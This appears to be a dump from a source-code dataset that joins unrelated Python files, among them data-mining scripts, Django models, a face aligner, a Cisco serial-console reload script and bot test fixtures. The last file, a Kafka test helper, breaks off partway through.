max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/Parse/NYUSupport.py | Stonehill-GWAIN-PC-Lab/Data-Mining-for-Procedural-Room-Generation | 2 | 12772851 | <reponame>Stonehill-GWAIN-PC-Lab/Data-Mining-for-Procedural-Room-Generation
#It's a matlab file that needs to be cleaned up
from scipy.io import loadmat
import h5py,math
from collections import Counter,defaultdict
import numpy as np
from .. import ObjectMetrics
#Return back a parsed list of Support frequency connections from the nyu_depth_v2_labeled matlab matrix.
#That matrix was converted from the originial found at https://cs.nyu.edu/~silberman/datasets/
def readMat(matPath): #10 percent in the paper
f = h5py.File(matPath+"nyu_depth_v2_labeled.mat",'r')
rooms = f['labels']
def conv1(x):
maximum = len(first_change)
if x[0] > 0 and x[0] < maximum:
x[0] = first_change[x[0]]
if x[1] > 0 and x[1] < maximum:
x[1] = first_change[x[1]]
return x
def convert(x):
if x[2] == 1:
x[2] = 'Vertical-Support'
elif x[2] == 2:
x[2] = 'Horizontal-Support'
else:
x[2] = 'Support'
if x[0] in names_to_id:
x[0] = names_to_id[x[0]]
else:
x[0] = 'room'
if x[1] in names_to_id:
x[1] = names_to_id[x[1]]
else:
x[1] = 'room'
return x
places = open(matPath + 'scenes.dat','r').readlines()
places = [i.strip().split('$') for i in places]
ps = {}
ret_data = defaultdict(list)
for x in places:
ps[int(x[0])] = x[1]
exitnames = open(matPath + 'names.dat','r').readlines()
exitnames = [i.strip().split('$') for i in exitnames]
names_to_id = {}
for i in exitnames:
names_to_id[int(i[1])] = i[0]
support = loadmat(matPath + 'support_labels.mat')['supportLabels']
#This loads the actual support code
for i in range(len(support)):
first_change = np.unique(rooms[i,:,:])
x = support[i][0].tolist()
place = ps[i]
x = list(map(lambda j:conv1(j),x)) #First, convert to correct names per scene
x = list(map(lambda j:convert(j),x))
#if place == "bedroom":
# print (x)
if place in ret_data:
ret_data[place].append(x)
else:
ret_data[place] = [x]
return ret_data
def cleanRules(scenes):
#Returns a cleaner rule-set where we pre-remove some noise
#This can be expanded into a better human-in-the-loop system
r = {}
for place in sorted(scenes.keys()):
result = []
for scene in scenes[place]:
res = []
for j in scene:
#print (j)
if 'None' not in j:
if j[2] == 'Vertical-Support' and 'wall' in j and not('floor' in j or 'room' in j):
pass
#print("did not add",j)
else:
res.append(j)
else:
print("did not add",j)
result.append(res)
r[place] = result
return r
def getSupportTypes(scenes):
#Quick helper function to get the types we have for a given scene
types = []
for scene in scenes:
for j in scene:
if j[2] not in types:
types.append(j[2])
return types
def supportFrequency(scenes, threshold = 0.1, debug = False):
''' Determines the support factors per scene'''
counts = {}
frequency = Counter()
thresh = len(scenes)*threshold
for i in scenes:
freq = Counter()
for j in i:
if 'None' not in j:
freq[j[0]] +=1
freq[j[1]] +=1
for f in freq:
frequency[f] +=1
if debug:
for i in scenes:
#first = i.split("$")[1]
#second = i.split("$")[2]
#if frequency[first] > thresh and frequency[second] > thresh:
for j in i:
print(j)
print (frequency)
#Then, we run through counts getting only the ones that are higher than the threshold
#set_freq = set([str(i) for i in frequency if frequency[i] > thresh])
#ret_counts = [i.split("$")+[str(counts[i])] for i in counts if counts[i] > s_thresh and i.split("$")[1] in set_freq and i.split("$")[2] in set_freq]
ret_freq = [["frequency",str(i),str(frequency[i])] for i in frequency if frequency[i] > thresh]
return ret_freq
def supportMining(scenes,good_objects,threshold = 0.1):
'''Performs frequent pattern mining on the directed acyclic graphs for support'''
min_gap = math.ceil(len(scenes) * threshold) #If we dont' have our single object at the minimum threshold, we won't have any larger support
counts = Counter()
for scene in scenes:
for i in [(edge[1],edge[0]) for edge in scene if edge[0] in good_objects and edge[1] in good_objects]:
counts[i] +=1
return [(pair[0],pair[1],str(counts[pair])) for pair in counts if counts[pair] >= min_gap]
def getSupportTypes(scenes):
#Quick helper function to get the types we have for a given scene
types = []
for scene in scenes:
for j in scene:
if j[2] not in types:
types.append(j[2])
return types
def buildSupportValues(scene,support):
#Returns a key-value dict that only has the support value in question
result = []
for i in scene:
res = []
for j in i:
if j[2] == support:
res.append([j[0],j[1]])
if len(res) > 0:
result.append(res)
return result
def mineNYU2Data(path_to_data,output_path):
''' '''
mat_path = path_to_data+"data/sunrgbd/nyu_2_mat/"
debug = False
support = readMat(mat_path)
support = cleanRules(support)#Cleans up some of our known noisy data that we shouldn't have
with open(output_path,'w') as fi:
for place in sorted(support.keys()):
print (place)
fi.write(','.join([place,str(len(support[place]))])+'\n')
support_types = getSupportTypes(support[place])
#print (support[place])
rf = supportFrequency(support[place],0.1)
for i in rf: #This is each item that was high enough support
fi.write(','.join([ObjectMetrics.cleanup_word(str(j)) for j in i])+'\n')
#In rc, we split up into our different factors. That will allow us to search each graph independently
for s in support_types:
prox = supportMining(buildSupportValues(support[place],s),[i[1] for i in rf],0.1)
for item in prox:
fi.write(','.join([ObjectMetrics.cleanup_word(s)]+[ObjectMetrics.cleanup_word(i) for i in item])+'\n')
del prox
| 2.34375 | 2 |
src/111.py | cloudzfy/euler | 12 | 12772852 | <filename>src/111.py
# Considering 4-digit primes containing repeated digits it is
# clear that they cannot all be the same: 1111 is divisible by
# 11, 2222 is divisible by 22, and so on. But there are nine
# 4-digit primes containing three ones:
# 1117, 1151, 1171, 1181, 1511, 1811, 2111, 4111, 8111
# We shall say that M(n, d) represents the maximum number of
# repeated digits for an n-digit prime where d is the repeated
# digit, N(n, d) represents the number of such primes, and
# S(n, d) represents the sum of these primes.
# So M(4, 1) = 3 is the maximum number of repeated digits for
# a 4-digit prime where one is the repeated digit, there are
# N(4, 1) = 9 such primes, and the sum of these primes is
# S(4, 1) = 22275. It turns out that for d = 0, it is only
# possible to have M(4, 0) = 2 repeated digits, but there are
# N(4, 0) = 13 such cases.
# In the same way we obtain the following results for 4-digit
# primes.
# Digit, d M(4, d) N(4, d) S(4, d)
# 0 2 13 67061
# 1 3 9 22275
# 2 3 1 2221
# 3 3 12 46214
# 4 3 2 8888
# 5 3 1 5557
# 6 3 1 6661
# 7 3 9 57863
# 8 3 1 8887
# 9 3 7 48073
# For d = 0 to 9, the sum of all S(4, d) is 273700.
# Find the sum of all S(10, d).
| 3.796875 | 4 |
demo/align_face.py | hologerry/pix2pix-flow | 2,898 | 12772853 | # OLD USAGE
# python align_faces.py --shape-predictor shape_predictor_68_face_landmarks.dat --image images/example_01.jpg
# import the necessary packages
from imutils.face_utils import FaceAligner
from PIL import Image
import numpy as np
# import argparse
import imutils
import dlib
import cv2
# construct the argument parser and parse the arguments
# ap = argparse.ArgumentParser()
# ap.add_argument("--shape-predictor", help="path to facial landmark predictor", default='shape_predictor_68_face_landmarks.dat')
# ap.add_argument("--input", help="path to input images", default='input_raw')
# ap.add_argument("--output", help="path to input images", default='input_aligned')
# args = vars(ap.parse_args())
# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor and the face aligner
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')
fa = FaceAligner(predictor, desiredFaceWidth=256,
desiredLeftEye=(0.371, 0.480))
# Input: numpy array for image with RGB channels
# Output: (numpy array, face_found)
def align_face(img):
img = img[:, :, ::-1] # Convert from RGB to BGR format
img = imutils.resize(img, width=800)
# detect faces in the grayscale image
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
rects = detector(gray, 2)
if len(rects) > 0:
# align the face using facial landmarks
align_img = fa.align(img, gray, rects[0])[:, :, ::-1]
align_img = np.array(Image.fromarray(align_img).convert('RGB'))
return align_img, True
else:
# No face found
return None, False
# Input: img_path
# Output: aligned_img if face_found, else None
def align(img_path):
img = Image.open(img_path)
img = img.convert('RGB') # if image is RGBA or Grayscale etc
img = np.array(img)
x, face_found = align_face(img)
return x | 3.171875 | 3 |
toontown/fishing/DistributedFishingTarget.py | AnonymousDeveloper65535/open-toontown | 8 | 12772854 | <gh_stars>1-10
from pandac.PandaModules import *
from direct.distributed.ClockDelta import *
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedNode
from direct.fsm import ClassicFSM
from direct.fsm import State
from direct.directutil import Mopath
from toontown.toonbase import ToontownGlobals
from direct.actor import Actor
import FishingTargetGlobals
import random
import math
from toontown.effects import Bubbles
class DistributedFishingTarget(DistributedNode.DistributedNode):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedFishingTarget')
radius = 2.5
def __init__(self, cr):
DistributedNode.DistributedNode.__init__(self, cr)
NodePath.__init__(self)
self.pond = None
self.centerPoint = (0, 0, 0)
self.maxRadius = 1.0
self.track = None
return
def generate(self):
self.assign(render.attachNewNode('DistributedFishingTarget'))
shadow = loader.loadModel('phase_3/models/props/drop_shadow')
shadow.setPos(0, 0, -0.1)
shadow.setScale(0.33)
shadow.setColorScale(1, 1, 1, 0.75)
shadow.reparentTo(self)
self.bubbles = Bubbles.Bubbles(self, render)
self.bubbles.renderParent.setDepthWrite(0)
self.bubbles.start()
DistributedNode.DistributedNode.generate(self)
def disable(self):
if self.track:
self.track.finish()
self.track = None
self.bubbles.destroy()
del self.bubbles
self.pond.removeTarget(self)
self.pond = None
DistributedNode.DistributedNode.disable(self)
return
def delete(self):
del self.pond
DistributedNode.DistributedNode.delete(self)
def setPondDoId(self, pondDoId):
self.pond = base.cr.doId2do[pondDoId]
self.pond.addTarget(self)
self.centerPoint = FishingTargetGlobals.getTargetCenter(self.pond.getArea())
self.maxRadius = FishingTargetGlobals.getTargetRadius(self.pond.getArea())
def getDestPos(self, angle, radius):
x = radius * math.cos(angle) + self.centerPoint[0]
y = radius * math.sin(angle) + self.centerPoint[1]
z = self.centerPoint[2]
return (x, y, z)
def setState(self, stateIndex, angle, radius, time, timeStamp):
ts = globalClockDelta.localElapsedTime(timeStamp)
pos = self.getDestPos(angle, radius)
if self.track and self.track.isPlaying():
self.track.finish()
self.track = Sequence(LerpPosInterval(self, time - ts, Point3(*pos), blendType='easeInOut'))
self.track.start()
def getRadius(self):
return self.radius
| 1.898438 | 2 |
social_media_crawling/models.py | diahnuri/TMSS | 1 | 12772855 | <filename>social_media_crawling/models.py<gh_stars>1-10
from django.db import models
# Create your models here.
class Crawl(models.Model):
name = models.CharField(max_length=100)
content = models.CharField(max_length=140)
c_at = models.DateField()
#Retweet = models.CharField(max_length=100)
#hashtag = models.CharField(max_length=100)
def _str_(self):
return self.content, self.name
class TwitterCrawl(models.Model):
name = models.CharField(max_length=100)
tweet = models.CharField(max_length=140)
date = models.DateField()
Retweet_user = models.CharField(max_length=100, null=True)
hashtag = models.CharField(max_length=100, null = True)
def _str_(self):
return self.tweet, self.name, self.Retweet_user, self.hashtag
class TwitterTopik(models.Model):
topik = models.CharField(max_length = 150)
def _str_(self):
return self.topik
class TwitterDataset(models.Model):
name = models.CharField(max_length=100)
tweet = models.CharField(max_length=140)
date = models.DateField()
Retweet_user = models.CharField(max_length=100, null=True)
hashtag = models.CharField(max_length=100, null = True)
topik = models.ForeignKey(TwitterTopik, on_delete=models.CASCADE)
def _str_(self):
return self.tweet, self.name, self.Retweet_user, self.hashtag
class FacebookCrawl(models.Model):
name = models.CharField(max_length=100)
status = models.CharField(max_length=5000)
like = models.IntegerField(blank=True)
comment = models.IntegerField(blank=True)
share = models.IntegerField(blank=True)
def _str_(self):
return self.name, self.status, int(self.like), int(self.comment), int(self.share)
class FacebookTopik(models.Model):
topik = models.CharField(max_length=150)
# user =
class FacebookDataset(models.Model):
name = models.CharField(max_length=100)
status = models.CharField(max_length=5000)
like = models.IntegerField(blank=True)
comment = models.IntegerField(blank=True)
share = models.IntegerField(blank=True)
topik = models.ForeignKey(FacebookTopik, on_delete=models.CASCADE)
def _str_(self):
return self.name, self.status, int(self.like), int(self.comment), int(self.share)
| 2.359375 | 2 |
scripts/extract_src.py | jvyduna/pb-examples | 3 | 12772856 | <gh_stars>1-10
# Use this to extract the src/ driectory from the contents of epe/.
# Aborts if it finds a file to overwrite; IE, to use this, explicitly delete the
# contents of src/ first, in order to not lose any changes made in the src/
# directory and not yet reflected in the corresponding .epe
import io, os, fnmatch, json, re
# Assumes the script lives in a subdirectory peer of epe/ and src/
script_dir = os.path.dirname(__file__)
indir = os.path.join(script_dir, "..", "epe")
outdir = os.path.join(script_dir, "..", "src")
for epe_filename in fnmatch.filter(os.listdir(indir), "*.epe"):
print("Extracting source from " + epe_filename)
with io.open(os.path.join(indir, epe_filename), 'r', 4096, 'utf-8-sig') as epe:
program = json.load(epe)
src_filename = re.sub(".epe$", "", epe_filename) + ".js"
with io.open(os.path.join(outdir, src_filename), 'x') as sourcecode:
sourcecode.write(program['sources']['main']) | 2.5 | 2 |
src/selfcoin/node/ui/ui.py | wangyubin112/selfcoin | 0 | 12772857 | from tkinter import *
from tkinter.font import Font
from tkinter.ttk import *
from tkinter.messagebox import *
#import tkinter.filedialog as tkFileDialog
#import tkinter.simpledialog as tkSimpleDialog #askstring()
from node.ui.access import access
from node.ui.trade import trade
from node.ui.post import post
from node.ui.charge import charge
from node.ui.watch import watch
from node.ui.show import show
class Ui(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master.title('Self-coin')
self.master.geometry('1200x1000')
self.createWidgets()
def createWidgets(self):
self.top = self.winfo_toplevel()
# self.style = Style()
## info
self.info_notebook = Notebook(self.top)
self.info_notebook.place(relx=0.0, rely=0.0, relwidth=0.5, relheight=1.0)
# self.info_notebook.grid(row = 0, column = 0, sticky=N+S+E+W)
show(self)
## operate
self.operate_notebook = Notebook(self.top)
self.operate_notebook.place(relx=0.5, rely=0.0, relwidth=0.5, relheight=1.0)
# self.operate_notebook.grid(row = 0, column = 1, sticky=N+S+E+W)
# tab 0 (access)
self.tab_access = Frame(self.operate_notebook)
access(self)
self.operate_notebook.add(self.tab_access, text='Access')
# tab 1 (post)
self.tab_post = Frame(self.operate_notebook)
post(self)
self.operate_notebook.add(self.tab_post, text='Post')
# tab 2 (charge)
self.tab_charge = Frame(self.operate_notebook)
charge(self)
self.operate_notebook.add(self.tab_charge, text='Charge')
# tab 3 (trade)
self.tab_trade = Frame(self.operate_notebook)
trade(self)
self.operate_notebook.add(self.tab_trade, text='Trade')
# tab 4 (watch)
self.tab_watch = Frame(self.operate_notebook)
watch(self)
self.operate_notebook.add(self.tab_watch, text='Watch') | 2.578125 | 3 |
pyserial_util/clear_reload.py | DevOps4Networks/iox-utils | 0 | 12772858 | #! /usr/bin/env python
# encoding: utf-8
"""
This script is intended to be used to automate the process of
clearing configurations and reloading, via a console connection,
for devices that support Cisco's IOx platform.
The outcome is a device that has no startup configuration, and which has
been booted from rommon-2 for a given image. This is the software equivalent
of using the reset button.
It assumes that there are one or more devices connected, typically via a mini-USB
cable, to the machine upon which this script is running. For example, a MacBookPro
with three such devices connected with a USB hub.
The script uses pyserial to connect to the serial ports and carry out a set of
interactions. The style is very reminiscent of "expect". That also means, though,
that things don't always work as expected because the CLI wasn't really meant for
automation like this, hence the copious logging.
Note that these drivers will likely be required for pyserial:
https://www.silabs.com/products/mcu/Pages/USBtoUARTBridgeVCPDrivers.aspx#mac
Copyright 2016 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import serial
import time
import sys
import logging
from logging.config import fileConfig
import os
from pyserial_util.cli_utils import *
usb_port_base = "cu.SLAB_USBtoUART"
enable_password = "<PASSWORD>"
def main(argv=None):
boot_image = "ir800-universalk9_npe-mz.SPA.156-2.T"
device_serial_ports = get_console_ports(usb_port_base)
logger.info("About to start on these serial ports and devices:\n")
for dev_ser_port in device_serial_ports:
logger.info("Port = " + str(dev_ser_port.serial_port) + " device type = " +
str(dev_ser_port.device_type) + "\n")
summary = []
for dev_ser_port in device_serial_ports:
logger.info("Working with a " + dev_ser_port.device_type + " at " + dev_ser_port.serial_port.port
+ " to clear startup configuration and reload.")
if enable(dev_ser_port.serial_port, enable_password) == 0:
dev_ser_port.serial_port.write("clear start\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if "[confirm]" in response:
dev_ser_port.serial_port.write("\r")
time.sleep(1)
dev_ser_port.serial_port.write("\r")
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if response.endswith("#"):
dev_ser_port.serial_port.write("reload\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if "Do you want to reload the internal AP ? [yes/no]:" in response:
dev_ser_port.serial_port.write("yes\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if "Do you want to save the configuration of the AP? [yes/no]" in response:
dev_ser_port.serial_port.write("no\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if "System configuration has been modified. Save? [yes/no]" in response:
dev_ser_port.serial_port.write("no\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if "Proceed with reload? [confirm]" in response:
dev_ser_port.serial_port.write("\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
summary.append("Cleared and reloaded a " + dev_ser_port.device_type + " at "
+ dev_ser_port.serial_port.port + ".\n")
time.sleep(60)
for dev_ser_port in device_serial_ports:
logger.info("Working with a " + dev_ser_port.device_type + " at " + dev_ser_port.serial_port.port
+ " to boot from rommon-2.")
while True:
dev_ser_port.serial_port.write("\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
if "rommon-2>" in response:
dev_ser_port.serial_port.write("boot flash:/" + boot_image + "\r")
time.sleep(1)
response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
logger.debug(response)
break
summary.append("Booted from rommon-2 a " + dev_ser_port.device_type + " at "
+ dev_ser_port.serial_port.port + ".\n")
logger.info("The summary is:\n")
for result in summary:
logger.info(str(result) + "\n")
return 0
if __name__ == "__main__":
sys.exit(main())
| 2.46875 | 2 |
ros/src/tl_detector/light_classification/tl_classifier.py | adityasiwan/system-integration | 1 | 12772859 | from styx_msgs.msg import TrafficLight
import cv2
import numpy as np
class TLClassifier(object):
def __init__(self):
pass
def get_classification(self, image):
"""Determines the color of the traffic light in the image
Args:
image (cv::Mat): image containing the traffic light
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
img_blur = cv2.medianBlur(image,3)
img_hsv = cv2.cvtColor(img_blur,cv2.COLOR_BGR2HSV)
red_lower_range = cv2.inRange(hsv_image, np.array([0, 100, 100],np.uint8), np.array([10, 255, 255],np.uint8))
red_upper_range = cv2.inRange(hsv_image, np.array([160, 100, 100],np.uint8), np.array([179, 255, 255],np.uint8))
yellow_range = cv2.inRange(hsv_image, np.array([28, 120, 120],np.uint8), np.array([47, 255, 255],np.uint8))
if cv2.countNonZero(red_lower_range) + cv2.countNonZero(red_upper_range) > 48 or cv2.countNonZero(yellow_range) > 48:
return TrafficLight.RED
else:
return TrafficLight.GREEN
# return TrafficLight.UNKNOWN
| 3.265625 | 3 |
tests/fixtures/messages.py | ExpressApp/pybotx | 13 | 12772860 | import pytest
from botx import (
ChatCreatedEvent,
InternalBotNotificationEvent,
InternalBotNotificationPayload,
Message,
MessageBuilder,
UserKinds,
)
from botx.models.events import UserInChatCreated
@pytest.fixture()
def incoming_message(host, bot_id):
builder = MessageBuilder()
builder.bot_id = bot_id
builder.user.host = host
return builder.message
@pytest.fixture()
def message(incoming_message, bot):
return Message.from_dict(incoming_message.dict(), bot)
@pytest.fixture()
def chat_created_message(host, bot_id):
builder = MessageBuilder()
builder.bot_id = bot_id
builder.command_data = ChatCreatedEvent(
group_chat_id=builder.user.group_chat_id,
chat_type=builder.user.chat_type,
name="chat",
creator=builder.user.user_huid,
members=[
UserInChatCreated(
huid=builder.user.user_huid,
user_kind=UserKinds.user,
name=builder.user.username,
admin=True,
),
UserInChatCreated(
huid=builder.bot_id,
user_kind=UserKinds.bot,
name="bot",
admin=False,
),
],
)
builder.user.user_huid = None
builder.user.ad_login = None
builder.user.ad_domain = None
builder.user.username = None
builder.body = "system:chat_created"
builder.system_command = True
return builder.message
@pytest.fixture()
def internal_bot_notification_message(host, bot_id, bot):
builder = MessageBuilder()
builder.bot_id = bot_id
builder.command_data = InternalBotNotificationEvent(
data=InternalBotNotificationPayload(message="ping"), # noqa: WPS110
opts={},
)
builder.body = "system:internal_bot_notification"
builder.system_command = True
return Message.from_dict(builder.message.dict(), bot)
| 2.046875 | 2 |
plugins/fb-messenger-1-0-0/main.py | pr4xx/db-forensic-framework | 1 | 12772861 | <reponame>pr4xx/db-forensic-framework<gh_stars>1-10
import click
from datetime import datetime
from pony.orm import *
from framework.Core import Core
from framework.analysis.chat.Chat import Chat
from framework.analysis.chat.Conversation import Conversation
from framework.analysis.chat.Message import Message as FrameworkMessage
from framework.analysis.chat.Participant import Participant
# Entity definitions
class F_User(Core.instance.db.Entity):
_table_ = "thread_users"
user_key = PrimaryKey(str)
name = Required(str)
class F_Thread(Core.instance.db.Entity):
_table_ = "threads"
thread_key = PrimaryKey(str)
messages = Set("F_Message", reverse="thread")
class F_Message(Core.instance.db.Entity):
_table_ = "messages"
msg_id = PrimaryKey(str)
thread = Required("F_Thread", reverse="messages", column="thread_key")
sender = Optional(Json)
text = Optional(str)
timestamp_ms = Required(int)
# Command definitions
@click.group()
@click.pass_context
def cli(ctx):
""" This plugin extracts chats and participants. """
Core.instance.db.generate_mapping()
@cli.command()
@click.pass_context
@db_session
def extract(ctx):
""" Generates multiple chats. """
chat = Chat("Facebook Messenger")
# Fetch all users and key by id
users = {}
db_users = select(u for u in F_User)[:]
for user in db_users:
users[user.user_key] = {
"db_user": user,
"chat_user": Participant(user.name)
}
# Fetch all threads
threads = select(t for t in F_Thread)[:]
for thread in threads:
conversation = Conversation()
# Fetch all messages of this thread
messages = thread.messages.order_by(F_Message.timestamp_ms)
for message in messages:
if not message.sender:
continue
user_key = message.sender['user_key']
time = datetime.fromtimestamp(message.timestamp_ms / 1000)
conversation.add(FrameworkMessage(users[user_key]['chat_user'], time, message.text))
chat.add(conversation)
Core.instance.render(chat)
| 1.945313 | 2 |
quiz/admin.py | Afnarel/django-quiz | 5 | 12772862 | <filename>quiz/admin.py
from django.contrib import admin
from quiz.models import Quiz, Category, Question, Answer
from forms import QuizAdminForm
class QuestionInline(admin.TabularInline):
model = Question.quiz.through
filter_horizontal = ('content',)
class AnswerInline(admin.TabularInline):
model = Answer
class QuizAdmin(admin.ModelAdmin):
form = QuizAdminForm
list_display = ('title', 'category',)
list_filter = ('category',)
search_fields = ('description', 'category',)
class CategoryAdmin(admin.ModelAdmin):
search_fields = ('name',)
class QuestionAdmin(admin.ModelAdmin):
list_display = ('content', 'category',)
list_filter = ('category',)
fields = ('content', 'category', 'quiz', 'explanation',)
search_fields = ('content',)
filter_horizontal = ('quiz',)
inlines = [AnswerInline]
admin.site.register(Quiz, QuizAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Question, QuestionAdmin)
| 2.1875 | 2 |
tests/test_utils/test_bot_info.py | vitaliy-ukiru/math-bot | 1 | 12772863 | <reponame>vitaliy-ukiru/math-bot
import unittest
from datetime import timedelta
from time import monotonic as time
import sys
from aiogram import Bot
from .dataset import CustomSysInfo, UptimeTimer
from app.misc import colorize
from app.utils.bot_info import format_sys_info, calc_ping, get_uptime
def _set_ms(td: timedelta, correct_value: float) -> timedelta:
td_diff = timedelta(microseconds=correct_value - td.microseconds)
return td + td_diff
class TestBotInfo(unittest.TestCase):
def test_sys_info(self):
self.assertEqual(format_sys_info(), str(CustomSysInfo()))
def test_calc_ping(self):
# Аргументы для calc_ping - timestamp, а ответ в мс
self.assertEqual(calc_ping(time(), time()), 0)
self.assertEqual(calc_ping(time() - 1, time()), 1000)
self.assertEqual(calc_ping(time(), time() + 0.53), 0.53 * 1000)
self.assertEqual(calc_ping(time() - 0.18, time()), 0.18 * 1000)
self.assertEqual(calc_ping(1923.80, 1924.20), 400)
def test_get_uptime(self):
# days, seconds, microseconds, milliseconds, minutes, hours, weeks
bot = Bot(token="<PASSWORD>:<PASSWORD>", validate_token=False)
periods = [
UptimeTimer(seconds=5), UptimeTimer(seconds=3, microseconds=56), UptimeTimer(seconds=0),
UptimeTimer(days=10, hours=3, minutes=4, seconds=56, microseconds=132)
]
for period in periods:
bot['start_time'] = period.start_time
_time_format = "%Y-%m-%d %H.%M.%S"
self.assertEqual(_set_ms(get_uptime(bot=bot), period.uptime.microseconds), period.uptime)
start, _, uptime = get_uptime(True, bot)
self.assertEqual(start.strftime(_time_format), period.start_time.strftime(_time_format))
self.assertEqual(_set_ms(uptime, period.uptime.microseconds), period.uptime)
def test_colorize(self):
self.assertEqual("\u001b[1;34m blue \u001b[0m", colorize.blue('blue'))
self.assertEqual("\u001b[31;1m red \u001b[0m", colorize.red('red'))
self.assertEqual("\u001b[32;1m green \u001b[0m", colorize.green('green'))
self.assertEqual("\u001b[33;1m yellow \u001b[0m", colorize.yellow('yellow'))
self.assertEqual("\u001b[36m cyan \u001b[0m", colorize.cyan('cyan'))
sys.argv.append("--no_color")
self.assertEqual("text", colorize.red("text"))
sys.argv.remove("--no_color")
if __name__ == '__main__':
unittest.main()
| 2.53125 | 3 |
dependencynet/core/datasource/levelsloader.py | cfalguiere/dependencynet | 0 | 12772864 | <reponame>cfalguiere/dependencynet<filename>dependencynet/core/datasource/levelsloader.py
"""
This module provides helpers to extract levels from source data
"""
import logging
import pandas as pd
class LevelsLoader:
logger = logging.getLogger(__name__)
@classmethod
def __init__(self, schema, source_df):
self.schema = schema
self.source_df = source_df
@classmethod
def extract_all(self):
dfs = []
self.logger.debug('extract_hierarchy schema=%s', self.schema)
keys = self.schema.levels_keys()
marks = self.schema.levels_marks()
pattern = '%s{id:02d}' % marks[0]
df_parent = self.__extract_items_root(self.source_df, [keys[0]], pattern)
dfs.append(df_parent)
for i in range(1, len(keys)):
df_i = self.__extract_items_non_root(self.source_df,
keys[0:i+1],
'{id_parent}%s{id:02d}' % marks[i],
df_parent)
dfs.append(df_i)
df_parent = df_i
return dfs
@classmethod
def __extract_items_root(self, df, keys, id_pattern):
self.logger.debug('extract_items_root keys=%s id_pattern=%s', keys, id_pattern)
id_key = keys[-1]
pos_key = 'pos'
self.logger.debug('extract_items_root id_key=%s', id_key)
items_df = df.drop_duplicates(subset=keys)[keys]
def get_pos():
i = 0
while i < len(items_df.index):
yield i
i += 1
items_df[pos_key] = pd.DataFrame(list(get_pos()), index=items_df.index)
items_df[pos_key] = items_df[pos_key] + 1
def format_id(p):
id = id_pattern.format(id=p)
return id
items_df['id'] = items_df[pos_key].apply(lambda x: format_id(x))
items_df['label'] = items_df.apply(lambda row: "%s %s" % (row['id'], row[id_key]), axis=1)
self.logger.info('extract_items_root keys=%s id_pattern=%s => shape=%s', keys, id_pattern, items_df.shape)
return items_df
@classmethod
def __extract_items_non_root(self, df, keys, id_pattern, parent_df):
self.logger.debug('extract_items_non_root keys=%s id_pattern=%s', keys, id_pattern)
id_key = keys[-1]
parent_keys = keys[0:-1]
self.logger.debug('extract_items_non_root id_key=%s', id_key)
pos_key = 'pos'
items_df = df.drop_duplicates(subset=keys)[keys]
items_df[pos_key] = items_df.groupby(parent_keys).cumcount()
items_df[pos_key] = items_df[pos_key] + 1
# enrich with parent id
items_df = pd.merge(items_df, parent_df[parent_keys + ['id']], on=parent_keys)
columns_mapping = {
'id': 'id_parent'
}
items_df = items_df.rename(columns=columns_mapping)
items_df['id'] = items_df.apply(
lambda row: id_pattern.format(id=row[pos_key], id_parent=row['id_parent']),
axis=1)
items_df['label'] = items_df.apply(lambda row: "%s %s" % (row['id'], row[id_key]), axis=1)
self.logger.info('extract_items_root keys=%s id_pattern=%s => shape=%s', keys, id_pattern, items_df.shape)
return items_df
| 2.375 | 2 |
data_pipeline/testing_helpers/kafka_docker.py | poros/data_pipeline | 110 | 12772865 | # -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
from contextlib import contextmanager
from kafka import KafkaClient
from kafka import SimpleConsumer
from data_pipeline.config import get_config
from data_pipeline.message import create_from_offset_and_message
_ONE_MEGABYTE = 1024 * 1024
logger = get_config().logger
@contextmanager
def capture_new_data_pipeline_messages(topic):
"""contextmanager that moves to the tail of the given topic, and waits to
receive new messages, returning a function that can be called zero or more
times which will retrieve decoded data pipeline messages from the topic.
Returns:
Callable[[int], List[Message]]: Function that takes a single
optional argument, count, and returns up to count decoded data pipeline
messages. This function does not block, and will return however many
messages are available immediately. Default count is 100.
"""
